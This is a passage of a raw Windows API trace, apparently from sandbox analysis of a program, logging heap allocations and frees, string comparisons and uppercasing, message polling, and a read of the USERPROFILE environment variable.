Size=0x10) returned 0x2aaa708 [0168.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0168.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Microsoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0168.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icrosoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0168.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crosoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0168.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rosoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0168.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="osoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0168.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0168.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0168.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0168.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0168.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0168.830] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0168.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0168.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0168.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0168.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0168.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0168.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0168.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0168.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0168.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0168.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0168.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0168.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0168.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0168.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7120 [0168.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0168.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Microsoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0168.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icrosoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0168.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crosoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0168.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rosoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0168.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0168.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0168.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0168.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0168.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0168.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0168.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0168.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0168.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0168.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0168.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0168.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0168.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0168.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0168.832] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0168.832] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0168.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0168.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0168.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0168.832] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0168.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0168.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0168.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0168.833] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0168.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0168.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0168.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0168.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0168.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0168.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0168.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0168.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0168.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0168.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0168.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0168.834] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0168.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0168.834] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0168.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0168.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0168.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0168.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0168.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0168.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0168.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0168.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0168.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0168.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0168.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0168.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0168.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0168.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0168.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0168.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0168.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0168.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0168.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0168.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0168.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0168.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0168.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0168.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0168.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0168.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0168.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0168.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0168.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0168.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0168.845] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0168.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0168.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0168.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0168.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0168.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0168.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0168.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0168.845] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0168.845] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0168.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0168.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0168.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0168.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0168.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0168.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0168.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0168.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0168.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0168.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0168.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0168.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0168.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0168.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0168.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0168.846] RtlAllocateHeap 